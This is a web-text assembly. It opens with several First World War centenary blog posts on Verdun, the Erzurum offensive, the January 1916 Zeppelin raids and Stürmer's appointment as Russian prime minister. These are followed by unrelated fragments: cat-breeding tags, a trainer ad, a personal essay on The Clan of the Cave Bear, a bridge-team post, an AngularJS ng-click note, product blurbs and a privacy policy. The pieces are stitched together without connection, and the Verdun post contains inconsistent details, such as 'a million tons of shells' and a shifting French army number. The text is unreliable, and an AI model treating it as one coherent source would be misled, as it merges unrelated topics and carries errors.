German Chief of the General Staff Falkenhayn had spent 1915 fighting his corner against the noisy ambitions of Eastern Front commanders Hindenburg and Ludendorff, merely able to hold positions in France and Belgium while resources flowed east. By the end of the year, with Eastern Front operations on hold and the distraction of Serbia out of the way, he was ready to concentrate on the West. Compared to Moltke and Hindenburg, his predecessor and successor in overall command, Falkenhayn often gets a fairly easy ride from posterity, but that doesn’t make him lovable, and the calculation behind his decision to attack Verdun is a fairly breathtaking example of cold pragmatism.
Reasoning that nothing he could do would knock either Great Britain or Russia out of the War, Falkenhayn identified France as only enemy Germany could beat in 1916. Experience had taught him that simply breaking through the trench lines, an approach attempted by everyone everywhere since late 1914, was an unlikely route to victory, so he chose to try grinding France to defeat by attacking where they would feel compelled to defend to the death. The offensive’s stated intention was to ‘bleed the French Army white’ by inflicting as many casualties as possible over a sustained period. I know that looks like a very bad idea, and it was, but in the context of early 1916 it was also a reflection of the desperation felt by commanders everywhere to do something, anything to bring an end to the stalemate – and at least Falkenhayn’s timing was good.
A massive build-up of German artillery and ammunition in the Verdun sector had begun in the New Year, at a time when the French Army was in the process of dismantling and reorganising the fortress defences. Field commanders of the French Second Army, drawn up in trenches some 5km in front of the outer fortresses, could hardly fail to notice that trouble was coming and sent repeated warning to the high command, but French c-in-c Joffre was busy planning his own offensive around the Somme and paid only belated attention. In late January a few French reinforcements did reached Verdun, along with some of the artillery stripped from the fortresses for front line use, but by late February, when a million troops of the German Fifth Army were ready to attack, only 200,000 men were defending the sector.
After a 21-hour preliminary bombardment had dropped more than a million tons of shells onto the area around Verdun’s eastern and northern forts, German troops advanced along a 12km front late on the afternoon of 21 February. They met more resistance than expected from surviving defenders, but had driven them back to their second line of trenches by the next day. On 24 February, the French Fifth Army withdrew to a third line of trenches, 8km from Verdun itself, and this exposed the prestigious but barely garrisoned fortress of Douaumont.
By that time French reinforcements were being rushed to the battle, but they were too late to prevent German capture of Douaumont on 25 February – and that triggered exactly the reaction Falkenhayn had been hoping for, in spades. French national outrage exploded into fervent popular determination to hold Verdun at all costs, to an extent that surprised even Falkenhayn, and from that moment any French withdrawal became a political and moral impossibility for the Briande government. So far so good for Falkenhayn, but not for long.
On 24 February command of the Verdun defence had been given to General Pétain. An experienced field commander who had long argued against fortress defence, Pétain responded to Joffre’s order forbidding any kind of withdrawal by rushing every artillery piece to the front from reserve areas and concentrating all his guns on the attacking German infantry. This brought the German advance to a halt by 28 February, when mutual ammunition shortage forced a lull in the fighting for a week. Having saved an apparently hopeless situation, Pétain used the breathing space to complete a thorough reorganisation of his lines , enabling rapid reinforcement and constant supply of French forces for a long battle.
Here’s a map of the battlefield, dull and stolen but efficient and self-explanatory, by way of adding some scale and context to what solidified into one of humanity’s great horror stories.
For now the pattern was set. Pétain had been established as a French military hero for the next 24 years or so, and Falkenhayn’s big plan was working as advertised – but as attrition set in at Verdun the big question begged by the offensive was yet to be answered. Could the French Army be bled into submission?
Nine months later, the answer would be no, delivered at a cost of about 434,000 German and 550,000 French casualties, half of them killed. The German Army had gained a few kilometres of ground, a few villages had been obliterated, most survivors had been scarred for life by the experience and the French nation scarred for all time.
Those are just the bare bones, and I’ll try to add flesh to the horror story during the next few months. Beyond simple information the only real purpose of this post is to make the point that, as usual during the Great War, a really terrible idea destined to go horribly wrong had its root, not in the mental deficiencies of its creators, but in the impossible dilemma of needing total victory in a world designed for anything but.
A month ago I mentioned that European weather in January 1916 was weirdly warm, but that exploiting it with any serious offensive action was beyond the military technology and orthodoxies of the day. By mid-February, northern and western Europe were well into an almost equally extraordinary spell of wet weather, destined to last another week or so before a fall in temperatures signalled an unusually cold, wet March. On the Western Front, where major offensives by both sides were still in preparation, weather conditions presented no more than a logistic nuisance – but soggy ground, mud and freezing cold were about to have their day in France and Belgium… and how.
So spare a small, forgiving thought for contemporary leaders when, amid the appalling carnage that took place on the Western Front in 1916, the heritage lines get clogged with contemptuous dismissals of their idiocy. Bad ideas, badly executed by bad generals were a problem by 1916, but commanders were not only dealing with a form of mechanised warfare that was still in the experimental stages, and working with unprecedented numbers of lightly trained, inexperienced troops, they were doing it under conditions created by one of the strangest winters in European history.
A little further south, on the alpine front between Italian and Austro-Hungarian forces, the weather was essentially normal for the time of year, that’s to say wintry, unpredictable and unsuited to fighting. Both sides were still in recovery from the four fruitless offensives launched by the Italians in the Isonzo valley during 1915, but while Austro-Hungarian forces were being reinforced for a future attack on positions further west, in the Trentino region, Italian commander Cadorna was preparing his battered troops for yet another Isonzo assault.
Nobody has much good to say about General Cadorna’s long, ugly campaign on the Italian Front, and quite right too, but in February 1916 even he deserved some sympathy. Italy had entered the War bent on territorial gain but in no economic condition to fight it, and was dependent from the start on Allied promises of military and economic aid. Nine months on, with public and press criticism of the military campaign mounting and urban food shortages becoming serious, Allied aid had become critical to national survival but was delivered only on the condition that the Italian government did exactly as Britain and France asked. In December 1915, at the Chantilly Conference, Italy had of course agreed that any Allied offensive should be supported by attacks on other fronts, so once Haig and Joffre had finalised their plans for offensives on the Western Front, Cadorna had no choice about mounting an attack. Given the requirement to do so quickly, he had little practical choice about its general location.
Elsewhere, the Eastern Front was still paralysed by winter, Salonika was inert, British plans for an advance into Palestine were still brewing, and the Mesopotamian campaign was locked around the siege of General Townshend’s troops in Kut. In Africa, German Cameroon had just reached the end of the line, and in German East Africa a new South African commander, Jan Smuts, was preparing a major British offensive against General von Lettow-Vorbeck’s resolute defence. In other words, the First World War was under starters orders for the year… unless you were in Armenia.
When I last gave the Caucasian Front its due (15 August, 1915: No Silver Lining), it lay fallow while both sides were busy elsewhere – Ottoman armies at Gallipoli, Russian coping with German advances on the Eastern Front. West of the front line, remaining Ottoman authorities then spent the latter part of 1915 attempting to wipe out the Armenian people, while on the eastern side Russian General Yudenich could only hold his positions until the high command provided sufficient reinforcements for an attack. The vast improvement in Russian industrial output, as discussed back in June, meant that by the end of the year Yudenich had built up a force of some 300,000 troops, including reserves. This outnumbered Ottoman forces at the front by at least three to one and Yudenich, aware that reinforcements were on their way from Gallipoli, chose to launch an offensive before they arrived.
On 10 January, in deep snow, Yudenich launched his advance into Armenia with preliminary attacks all along the front. Ottoman forces, most of them still in winter camp, were taken by surprise, and a week later the Russians broke through the lines at Köprukoy, inflicting some 25,000 casualties but failing to surround the rest of the Turkish Third Army, which retreated into the reputedly impregnable fortress city of Erzurum.
By the end of the month Russian forces had besieged Erzurum, and a century ago today, on 16 February 1916, the garrison surrendered, giving up some 13,000 prisoners and 350 (largely obsolete) artillery pieces. Two days later, a secondary advance to the south took the town of Mus. All this deserves a map, but as I’ve mentioned before the Internet is a little short on remotely comprehensible maps of the Caucasian Front, so this is the best I can do:
The fall of Erzurum and Mus ended the first phase of a genuinely successful campaign. Alone among senior Russian commanders at the time, Yudenich understood the concentration and reserve strength needed to achieve a breakthrough, knew how to take enemies by surprise and was open to innovation. Crucially, he also recognised the inherent dangers of over-extension that had been ruining grand offensive plans since 1914, and pursued strictly limited objectives. Better yet, because regional commander Grand Duke Nikolai was busy with factional intrigue in far off Tbilisi, Yudenich was left to get on with being a good general without interference from Stavka.
Having caught the Turks unawares and under strength, and broken through their lines, Yudenich made no attempt to exploit the victory by sweeping onward into the heart of Turkey, as the likes of Ludendorff would surely have done (and as British commanders in Palestine were hoping). Instead he sprung another surprise by turning his armies northwest from 22 February, and using naval landings to occupy Black Sea coastal positions before taking Trabzon in April.
In the summer, Yudenich expanded his area of control with an attack west of Erzurum, advancing the front line some 150km and taking the town of Erzincan in late July. The advance nipped most of a planned Turkish offensive in the bud, and although the Ottoman Second Army did advance at the southern end of the front to take Bitlis in August, Russian counterattacks had recovered all the lost ground by the end of the month. At that point, aware that the theatre was of secondary importance to Stavka and unlikely to be heavily reinforced, Yudenich cashed in his chips and spent the rest of the year consolidating his gains.
The long-term strategic importance of the Erzurum Offensive is debatable, given that the collapse of both competing empires made it irrelevant to the political future of Armenia, but in the short term it did protect at least some of the region’s population from the further predations of genocide-inclined Ottoman officials. Its main claim to fame, or at least to my interest, is that (with the qualification that it benefitted from some very poor defending by ill-equipped Ottoman forces) it can honestly be called efficient and successful, which is more than you can say for anything else attempted by the major powers since the autumn of 1914.
Yudenich was not the only general to have begun solving the offensive conundrum posed by the state of the military-technological world in early 1916. Australian General Monash had, for instance, been learning similar lessons on a smaller scale in the cauldron of Gallipoli. For now though, they were voices in the wilderness, drowned out by the sweeping strategies of leaders desperate to end the agony with one killer blow. It would be another two years before the pragmatic good sense of their step-by-step approach to victory would find much general acceptance, and that, as history’s grim statistics record, was a terrible shame.
It’s been eighteen months coming, but I’ve finally reached a week short on centenaries to get excited about. True, 8 February 1916 was the day on which the British government made a formal request on to its Far Eastern ally, Japan, for naval aid, but that didn’t get exciting for a couple of decades. As I’ve mentioned before (23 August, 1914: Prowling Tiger), the squadron of Japanese destroyers that eventually arrived to join Allied Mediterranean patrols in April 1917 did nothing of any military significance, but did learn plenty about the latest naval techniques and equipment.
The last rites of the Central Powers’ invasion of the Balkans were also in progress, with Bulgarian and Austrian forces mopping up in Albania and Montenegro respectively, while the remnants of the Serbian Army were still being evacuated to Corfu, where a government in exile was established on 9 February. Again, I’ve been there and done that (25 November, 1915: The Hard Way), and the same is true of the increasingly bonkers British Naval Africa Expedition, which was busy with its gunboat war for control of Lake Tanganyika (15 June, 1915: Do So, Mister Allnut…).
Early February also saw the usual trickle of naval losses, most notably the Amiral Charner, an old French cruiser stationed off the Syrian coast. Part of the naval blockade of the Ottoman Empire, she was torpedoed by the U-21 on 8 February and went down with only one survivor. Three days later, the British lost a much more modern light cruiser, the Arethusa, when it struck a mine off Felixstowe, a disaster that cost only ten lives but, so close to home, fuelled the pathological caution of British naval commanders in the North Sea.
Otherwise, on all the main battlefronts, the weather was being watched while offensives were being prepared. Russian forces in the Caucasus were almost ready to begin a push into Armenia towards Erzurum; in northern Italy, yet another Izonso offensive was grinding towards action; and the German Army, after a year with its focus firmly to the east, was about to start punching its increased weight on the Western Front. This was the quiet before the storm and everybody in the belligerent countries knew it.
That didn’t mean everybody was talking about it. Offensives being of a necessarily secret nature, this was a good time for the official and unofficial press (and thus popular opinion) to focus on issues at home. That, along with the sensational nature of the subject and the existence of some excellent illustrations, explains why newspapers and magazines in Britain and France were still full of news about Zeppelins. It also gives me an excuse to go back a few days to an anniversary I skipped.
The source of most press coverage had been two Zeppelin raids at the end of January. During the misty night of 29/30 January a single airship, the LZ77, bombed Paris, killing 29 civilians and injuring thirty. This would turn out to be the last Zeppelin raid on Paris, and a turning point in German bombing strategy.
Two nights later, a fleet of nine German Navy Zeppelins set out from bases in northern Germany to bomb the British mainland, with instructions to fly right across the country and demonstrate their long-range power by attacking the vitally important port of Liverpool. Nothing so bold had ever been attempted before, by Zeppelins or winged aircraft, and though the raid’s main purpose was to frighten the enemy, it was also an experiment to test the viability of very long-range bombing.
At this stage in the development of powered flight, Zeppelins were the only weapons available to those who advocated, and would later practice, the monstrosity of strategic bombing theory. That’s the theory, popularly associated with Göring and Harris but tried out by many others during and since the First World War, that bombing the Hell out of civilian targets can win wars on its own. By 1914 the theory, first proposed by the Italian air theorist Douhet as early as 1911, had advocates in all the major belligerent states, but they all faced the problem that aircraft technology couldn’t deliver machines with the range or payload to make massed bombing of distant enemy targets feasible.
Up to a point, Zeppelins solved the problem. Designed by German nobleman Graf (Count) von Zeppelin, and first flown in 1900, they were accepted into German Army service from 1909. By August 1914, the German Army was using ten Zeppelins and the German Navy one, all attached to the high command for strategic operations.
Little use as frontline reconnaissance craft, because they took so long to get into the air, Zeppelins announced themselves as bombers at the very start of the War, when the Z6 successfully attacked Liège on the night of 6/7 August. But the Z6 had to be withdrawn from service after ground fire forced it to crash land, and that set a pattern for Zeppelin operations: they could deliver long-range bombing raids, but were extremely vulnerable to attack and bad weather.
By the spring of 1915, with eight new airships commissioned and six lost, the German Army fleet was concentrated in Belgium for bombing missions over Flanders, France and England. Paris suffered regular small-scale attacks, and the first raid on London took place on 31 May. Despite the introduction of new, bigger Zeppelins, with their trademark extendable observation cars slung beneath the ship, a bomb load of 1,200Kg and the ability to attack from above clouds, losses remained high throughout the year, even after bombing operations were restricted to moonless nights.
By the start of 1916 only six German Army Zeppelins were operational. Still too slow and fragile for effective frontline operations, as would be confirmed by a final deployment at Verdun that saw three of four ships destroyed almost at once, their bombing role was being undermined by improvements in air defence technology. That the gathering of naval Zeppelins for the raid on Liverpool was essentially a propaganda operation reflected the German high command’s fading faith in their ability to deliver a strategic blow.
On one level the raid failed miserably. Mechanical problems and poor navigation in difficult conditions meant that the Zeppelins got hopelessly lost, scattering bombs around various towns and factories in the English Midlands. Around 70 civilians were killed and about 115 injured (exact figures vary), making it the second most lethal wartime attack on Britain, but it failed to inflict any serious infrastructural damage. On the other hand the Zeppelins suffered only one loss, when the L19 was shot down and crashed in the Channel, proving that very long-range attacks were possible, and they fulfilled their propaganda role by causing a genuine sensation. With new, higher-altitude models about to come into service, the airships had earned one last chance to prove their strategic value.
The L19 was lost with all hands after Dutch ground fire brought it down in the Channel… and the Allied press loved it.
They did well. Attacks on England by flotillas of four and five ships were carried out without loss in April 1916 and, as numbers of operational ships grew, the next few months saw the climax of their career as long-range bombers. Britain suffered twenty more raids during the year, five German Army airships performed well on the Eastern Front, suffering just one loss, and three more were deployed in the Balkans, though with less success. Yet just as the Zeppelins were starting to deliver as promised, aircraft technology was finally passing the tipping point that ended the argument about their strategic value.
By late 1916, modern fighter aircraft could reach and destroy the highest airship, and heavier, multi-engine aircraft could deliver bigger, more efficient strategic bombing attacks. A reorganised German Army Air Service lost interest in airships, preferring to concentrate on its heavy aircraft programmes, and ceased Zeppelin operations altogether from June 1917. German Navy Zeppelins continued in service until the end of the War, carrying out small raids and occasional supply missions, but they were never more than a marginal nuisance. The day of the military airship had passed.
In some ways the raid that shocked the Midlands during the last night of January 1916 was the Zeppelins’ finest hour. The sheer distance they travelled and the surprise they caused took strategic bombing to a new level, and foreshadowed massed raids to come, as did the incidental fact that the attack caused only civilian casualties. In other ways it was their last hurrah, bigger than any operation subsequently attempted with airships, and the last time they carried the baton for strategic bombing theory before it passed to the ancestors of the B-52.
The early part of 1916 wasn’t a good time for imperial leadership in Europe. The British government was dithering in search of strategic inspiration, and French political authorities were struggling to maintain credibility with an increasingly war-weary population. The pressures of total war under blockade conditions were forcing German society and economy into dangerous overdrive, and were destroying the socioeconomic unity of the Austro-Hungarian and Ottoman Empires.
In London, Paris, Berlin, Vienna and Constantinople, authorities were sharply aware that keeping the body politic onside and committed to victory was vital to national survival, so that even the Kaiser’s conservative and autocratically inclined regime tried to at least present military and sociopolitical changes as ultimately beneficial to Germans in general.
A century ago today, Boris Stürmer replaced Ivan Goremykin as Russian prime minister. Unlike other changes at the top around Europe during the winter of 1915–16, the appointment had nothing to do with keeping opposition politicians, the national workforce or anyone else onside – and everything to do with keeping Tsar Nicholas and his wife happy.
It’s not that getting rid of Goremykin was an unpopular move. The veteran lawyer and bureaucrat, well into his seventies and in semi-retirement when appointed prime minister in early 1914, got the job because his ultra conservative views and ingrained subservience to the crown chimed nicely the Tsar’s preferences. For two years he’d performed as advertised, maintaining a complete disregard for popular opinion and a mutually hostile relationship with the Duma, Russia’s half-baked parliament. To no one’s surprise, he had been the only civilian minister to support the Tsar’s decision to take personal charge of the high command, Stavka, in September 1915, and that display of automatic loyalty eventually cost him his job.
In the Tsar’s absence, court affairs fell under the control of his wife, the Tsarina Alexandra, a woman who combined strength, stupidity and a penchant for scheming to dangerous effect. With liberal deputies in the Duma clamouring for the prime minister’s removal as the military situation went from bad to stagnant, she and Gregor Rasputin – the mad, monkish mystic behind most of her thinking – engineered Goremykin’s replacement by one of their trusted protégés, a man guaranteed to antagonise all but the most rigidly conservative royalists.
Another seasoned bureaucrat and courtier, Stürmer was a surprise choice, not one of the usual royalist suspects for high office, but in every other respect he was anything but a fresh start. No less unbendingly conservative than his predecessor, and eight years younger, he was chosen because the Tsarina and Nicholas believed that unpatriotic opposition, its roar reduced to a murmur inside the blackout blanket of court life, could be silenced if the Duma was confronted by a more vigorous defender of royal privilege. That Stürmer was a sick man, distinctly short on vigour, seems to have mattered less than his guaranteed obedience to Alexandra.
Stürmer lasted as prime minister for almost nine months, during which he did nothing whatsoever to sustain the regime he served. Ill health interfered with his workload from the start, but that didn’t stop him adding the interior ministry to his portfolio in March and switching it for foreign affairs in July. His general performance, reminiscent of the dilettante politicians of the Napoleonic era, attracted contempt from all sides, and his unpopularity on the streets ran a close second to that of the much more energetic (and genuinely loathsome) interior minister, Aleksandr Protopopov.
Detested by the Duma and many of his cabinet colleagues, Stürmer ignored accusations of incompetence and (false) rumours that he was German agent, and relied on the favour of the Tsarina to keep him in his jobs. His policy, such as it was, amounted to ignoring dissent in the name of stability, and was dictated to him by the Tsarina. Meanwhile, furious protests went unanswered amid economic chaos at a time of desperate national dependence on a cooperative workforce, and demands for his removal grew ever louder. By November 1916, with opposition in the Duma coming to the boil, the Tsar and Tsarina were ready, albeit reluctantly, to dispense with his services.
The Tsar, who regarded any kind of parliament as an affront to the crown, had reconvened the Duma in July 1915 to provide fundraising for the government at a time of national crisis. Now he, his wife and Rasputin wanted rid of it, but simply dismissing it risked turning opposition into open revolt, a dangerous prospect when so much power was so concentrated in Moscow and St. Petersburg. Instead, calls for Stürmer’s removal were answered in late November and the relatively moderate Trepov installed in his place. Though the hated Protopopov remained in office, the gesture appeased the Duma just enough for Trepov to secure its peaceful adjournment in late December, at which point he was fired.
Having secured a hollow victory by silencing the only legitimate voice of opposition, effectively putting their fingers in their ears, Nicholas and Alexandra then appointed a complete nonentity, Prince Golitsyn, as prime minister and carried on as autocrats, but not for long…
All of the above is a very sketchy, partial picture of a very complex pre-revolutionary situation in Russia – so don’t go mistaking it for anything like the full story. All I’m trying to do emphasise an essential difference between Russia and the states of Western Europe, then and now.
Russia in 1916 was a mediaeval empire, with twentieth-century technology, ideas and political pressures grafted onto very few, highly concentrated hotspots. The Romanovs, surrounded by mediaeval courtiers obedient to their godlike whim, existed in a bubble within a bubble. Royals and courtiers were in turn surrounded by the seething, revolutionary modernity of the cities that housed their palaces, but quite rightly believed that beyond the cities lay a vast nation loyal to the old ways.
Under those circumstances, revolution was probably coming to Russia anyway. The blinkered, factional behaviour of the Russian royal family, so often blamed for its fall and nicely illustrated by the prime ministerial change of January 1916 , was as much a symptom as a cause of revolutionary conditions. The same peculiar preconditions mean that, much as I like to make connections between then and now, claims that the 1917 revolution was ’caused’ by the First World War are equally simplistic.
On the other hand, the crashing impact of total, industrialised warfare did speed the arrival and shape the character of a revolution that drove the political development of 1917’s vast, mediaeval nation up an isolated blind alley for the next three-quarters of a century. From that perspective it’s not so hard to spot the direct link between the Great War and a modern Russia that, a century after Stürmer’s appointment, is being run by a would-be autocrat with a puppet prime minister.
So which modern US president has done most damage to the world by mouthing off at midterm? My answer's at poppycockww1.com. ...
In which the British finally conquer the Middle East, get their black gold and end up feeling a bit shamefaced about it. Share that shame at poppycockww1.com ...
For centuries the Habsburgs had exerted a big, baleful influence over the development of modern Europe, and now they were screwed. Wave them goodbye at poppycockww1.com ...
Ask a heritage peddler, they were just the space between static and stupid; ask me, these were the weeks that shaped our world. Ask poppycockww1.com, and you'll get the long version. ...
Kattungar (131) Parning (96) Maja (60) Kull7 (44) Kull6 (36) Frans (35) Kull5 (33) Kull8 (19) Lilla Bu (19) Ture (19) Avelshane (18) Aurora (17) Kull4 (17) Utställning (16) Kull9 (15) Keisarinna (13) Räven (13) Till salu (13) Dolly (12) Kull10 (10) Allmänt (8) Kattsläkt (7) Vittra (6) Sebastian (5) Avel (4) Kippis (4) Baltasar (2) Omplacering (2) Film (1) Kull1 (1) Kull2 (1) Kull3 (1)
save on your favourite nike air huarache ultra breathe black orange white trainers online and free delivery and returns available, order today!
After a two-year battle with breast cancer, my mom died 16 years ago today. Last year I wrote about my typical Dairy Queen remembrance (“Commemorating the Anniversary of my Mom’s Death”). This year I thought I’d try something new, but don’t worry, what my mom jokingly referred to as a “recommended daily dose of Dairy Queen” is still on order.
When I was a kid I remember that my mom was a fan of Jean M. Auel’s Earth’s Children series. The Clan of the Cave Bear and its sequels were always around the house. Sadly my mom didn’t live long enough to read the last two novels in the series.
I’ve always meant to read some of those books, both as a way to connect with my mom and out of my amateur interests in paleoanthropology (I’m particularly fascinated by Neanderthals). Recently I decided to finally start the first book.
As a science fiction fan, I’ve enjoyed Robert J. Sawyer’s Neanderthal Parallax (alternate universe Neanderthals visit Canada!) and Kim Stanley Robinson’s Shaman (an excellent novel about early humans living about 30,000 years ago near the Chauvet Cave in France). In interviews Robinson has said that he considers Shaman to be science fiction as it is fiction based on and compatible with current scientific understandings in paleoanthropology.
On that note, I consider Auel’s books to be science fiction as well, although she didn’t have Robinson’s benefit of several additional decades of research. For example, the main character, Ayla, could not have had blonde hair and blue eyes over 30,000 years ago as these are more recently developed human traits, and Neanderthals may have died out before the novel takes place (some recent estimates place their extinction closer to 40,000 years ago).
I haven’t finished The Clan of the Cave Bear yet. I’m about halfway through. Here are some thoughts thus far.
I see why my mom liked this book. Auel’s world building (if that’s the right word for it) is amazing. I see why some readers find the details, especially of flora and fauna, to be too much. In particular, get ready for a whole lot of information about medicinal herbs. Auel consistently violates the “show don’t tell” rule, but I think that’s a silly rule, anyway, especially when you have a whole world to explain! In my opinion, the detail enhances the sense that you’re not just reading a story, you’re traveling 30,000 years into the past.
The story itself is engrossing as well. Young Ayla, a Cro-Magnon girl, finds herself orphaned and then adopted by a clan of Neanderthals. She’s a permanent outsider, but she also forms deep personal connections. She’s depicted as having certain cognitive and physical advantages over the rest of the clan (nowadays scientists increasingly see Neanderthals as cognitively not so different from us).
The Neanderthal society as depicted in the book has a strictly patriarchal power structure. Although women are exclusively in charge of some spheres (medicine, childbirth, and so on), the men are hunters who have near complete power to order women around. In real life there’s disagreement about Neanderthal gender roles and some scientists think it’s possible that women were hunters, too, but it’s worth remembering that this is a novel, not a textbook.
As a novel it’s clear Auel is using her artistic license, but it’s not entirely clear what she’s doing with that license. Is it a statement about feminist challenges to patriarchy, especially given Ayla’s trouble accepting these power relations? Is it advocating a sort of difference feminism? Is it a critique of feminism?
Whatever the case may be, I wondered how my mom must’ve felt about it, especially as a single mother raising two kids in the 80’s and early 90’s. Did she herself have trouble fitting into patriarchal power structures?
I remember once being listed as her husband on correspondence from our church. Apparently the idea of a single mother with a son did not compute for suburban Catholics in the late 80’s. When I was about 10 or 12, I remember my mom lamenting the fact that I didn’t have enough male role models. Without missing a beat, I responded, “Sure I do: I have you!” I was probably making a joke, and I did actually have some male role models, but maybe I unwittingly had a serious point: she did an excellent a job in difficult circumstances.
I decided to read one of my mom’s favorite books as a way to connect with my past as a human being and as a son. Whether they’ve been gone 30,000 years or 16 years, whether we know them through science or memory, we are always in the shadows of our ancestors genetically, psychologically, culturally. A few months ago my sister gave birth to a boy (her son, my nephew, my mom’s grandson); he’s an adorable little baby and a concrete reminder that this entanglement of ancestors and descendants stretches into the future as well.
Today I’m reading a book about prehistoric humans to feel connected to the one ancestor who did more than anyone else to make me who I am, whom I miss incredibly, and who, it turns out, liked an interesting book and was always sure to have her daily recommended dose of Dairy Queen.
It is pretty badly outdated by now and the other five books in the series are not nearly as good as the first. It is not as apparent in the first book but the whole fall from paradise that is the overarching theme of the series starts to grate after a while. To the point where I wasn't even sure I should do reviews of the last two.
I enjoyed reading this one a lot though. Whatever her flaws as a writer may be, her comprehension of ice age ecology and various survival techniques is very impressive.
Yes, I'm trying to remember that this is a work of fiction, although Auel did a great job given what was current around 1980. As a novel, I'm enjoying it very much. I'll check out the next book or two. Most people seem to share your view that the later books go downhill considerably. Thanks for the comment!
I read this in highschool and, I must admit, it did not thrill me (even though I was something of a target demographic for it) and I never read the rest. Ah well. I remember just being very unsatisfied with it. I'm not sure I actually finished reading it.
In completely meaningless coincidences, my father died 8/6/00 -- he died in his sleep of congestive heart failure, at home, and because he'd concealed his condition, I didn't know and thus didn't find out for about two days, when his body was discovered by a friend of his when he didn't show up for work.
That's a sad coincidence. I'm sorry for your loss. My mom's death wasn't such a surprise given her terminal illness, but she took a sharp turn for the worse just a few days earlier.
The thing is, I may have to revisit the book, as I have found occasionally my teenage impressions of particular books changes over the years. Now I'm curious. I'll have to hunt for a cheap copy and give it the 3 chapter/100 pages trial.
Now that I've finished the book, here are my thoughts on the whole thing: https://www.goodreads.com/review/show/1226596912
«For Syriza to avoid collapse or total surrender, we must be truly radical. Our strength lies exclusively in the tremendous popular support we still enjoy. The government should rapidly implement measures relieving working people from the tremendous pressures of the last few years: forbid house foreclosures, write off domestic debt, reconnect families to the electricity network, raise the minimum wage, stop privatisations. This is the programme we were elected on. Fiscal targets and monitoring by the “institutions” should take a back seat in our calculations, if we are to maintain our popular support. (...)
Syriza could gain succour from the European left, but only if the left shakes off its own illusions and begins to propose sensible policies that might at last rid Europe of the absurdity that the common currency has become. There might then be a chance of properly lifting austerity across the continent. Time is indeed very short for all of us.»
Toggles between Folders and Songs Lists. If focus is on Folders list, hold for +1 sec to open/close subfolders
Reproduction of this manual in full or in part without written permission from Atomix Productions is prohibited.
On April 9th, our class did an egg drop test out of the library window. Only one egg survived, and the egg was later named Larray. A few days after, we dropped Larray from a higher window, and he, sadly, passed away. That afternoon, we buried him in the corner of the schoolyard and there, he was laid to rest. Today, we visited the grave...
Truly a must-see video, where Zia humor is preponderant and Giorgino is not far behind … if YOU want to laugh a little bit … this is your chance:
The Lavazza team is considered one of the best teams in the bridge world. Logically through time, its members change, and since more than five years ago one of its members, is the World Champion Agustin Madala, who is now only 28 years old.
Since Agustin’s arrival to the team, all its members feel that the team has been rejuvenated and energized, so much so that last year the team won the Open Teams World Championship.
During 2014, one of the players, Antonio Sementa, decided not to join the team and moved to the Angelini team. We have to add the sudden physical disappearance of Guido Ferraro. This meant the need to incorporate new players. But the alma mater of the team Mrs. MT Lavazza, took the determination not to occupy their places always with the same players.
The idea was to leave open some place for young figures that could appear in the bridge horizon or for experienced players when the event could need a more experienced player.
That’s why one of the best Argentinian players, Alejandro Bianchedi, started playing in the team since the beginning of this year and the great Zia Mahmood has been part of the team in the team interventions in the American NABC.
Many bridge players dont understand the appearance of Zia in the team, since it is not from a Latin country and does not speak Spanish or Italian.
To understand the issue, the WBF decided to make a video where Zia and Duboin, Sanya 2014 partnership, interview each other and explain to the bridge world why they are playing together and how do they combine their bridge styles.
Truly a must-see video, where Zia humor is a must… Giorgino not far behind … if YOU want to laugh a little bit … this is your chance:
Posts del Mes/Month Posts Select Month October 2018 January 2018 July 2017 June 2017 May 2017 April 2017 March 2017 February 2017 January 2017 December 2016 November 2016 October 2016 September 2016 August 2016 July 2016 June 2016 May 2016 April 2016 March 2016 February 2016 January 2016 December 2015 November 2015 October 2015 September 2015 August 2015 July 2015 June 2015 May 2015 April 2015 March 2015 February 2015 January 2015 December 2014 November 2014 October 2014 September 2014 August 2014 July 2014 June 2014 May 2014 April 2014 March 2014 February 2014 January 2014 December 2013 November 2013 October 2013 September 2013 August 2013 July 2013 June 2013 May 2013 April 2013 March 2013 February 2013 January 2013 December 2012 November 2012 October 2012 September 2012 August 2012 July 2012 June 2012 May 2012 April 2012 March 2012 January 2012
As the name suggests the ng-click directive is used to handle click events from controls in the view layer. The ng-click directive is commonly associated with button controls to trigger events from the view to the controller layer, but they can be associated with any type of controls like dropdowns, links etc.
The function is defined in the controller under $scope, when the user triggers the event the function associated with the ng-click directive gets executed and performs appropriate updates in the model ($scope) and the view.
The following example shows how the ng-click directive associated with the Clear button clears the properties FName and LName in the model and view.
The radiant® RF Lighting Control System offers simple control, a variety of device types, customizable scenes and the convenience of Android and iOS apps, so control is always in hand. This RF Lighting Control System Starter Kit (LC7500-WH) includes:
Wägesysteme Schneidemaschinen Fleischwolf Knochensäge umwaagen Service GmbH - BIZERBA Vertragspartner
Mason is a County which belongs to the state Michigan in United States of America. There are total 6 cities in this county. Total number of zipcodes/pincodes in Mason are 6.
Evans Concrete provides bespoke precast concrete solutions for a wide variety of projects ranging from new build commercial and residential, civil and structural engineering, hard landscaping and public art.
We are proud to have been in business for over 45 years. Our mission is to help individuals with special needs acquire the skills and attitudes required to function effectively as contributing members of society. The corporation accomplishes its mission by providing affordable and innovative products for individuals of all ages having special needs as well as all those who serve this population.
We accept Purchase Orders from school districts and established businesses via the following methods:
If you are not completely satisfied with any item purchased, we will gladly exchange the product, issue a credit memo, or refund your money. Returns must be in resalable condition and made within 30 days of receipt of your order. Before returning merchandise, please call Customer Service at 800-549-6999.
We are the sole owners of the information collected on this website. We only collect information that you voluntarily give us via email or other direct contact from you. We will not sell or rent this information to anyone.
We will use your information to respond to you, regarding the reason you contacted us. We will not share your information with any third party outside of our organization, other than as necessary to fulfill your request, e.g. to ship an order.
We take precautions to protect your information. When you submit sensitive information via the website, your information is protected both online and offline.
Wherever we use encryption to protect sensitive information transmitted online, we also protect your information offline. We do not store hard copy credit card information in our office files nor do we store electronic credit card information on company computers. Only employees who need the information to perform a specific job, e.g. billing or customer service, are granted access to personally identifiable information; e.g. name, address, phone, etc.
Alexander Zammit has been developing server applications for over 15 years. Most of his works involve Exchange integrated applications, including a FAX server, a mail security product and anti-spam products.
MS Exchange 2007/2010 Outlook Web Access lacks the ability to recall emails sent in error, even though this functionality has been available in Outlook for many years. A new OWA extension is making up for this omission, bringing the web interface closer to Office Outlook.
For many years MS Outlook users had the ability to recall emails sent in error using the Recall This Message command. We discussed this functionality in How Exchange Message Recalling Works and Message Recall Success! ...kind of.
With every MS Exchange release, the Outlook Web Access/App interface made significant leaps forward. Today for many Exchange users OWA is the primary mailbox interface. However not all Outlook features made it into OWA and Message Recalling is one of these.
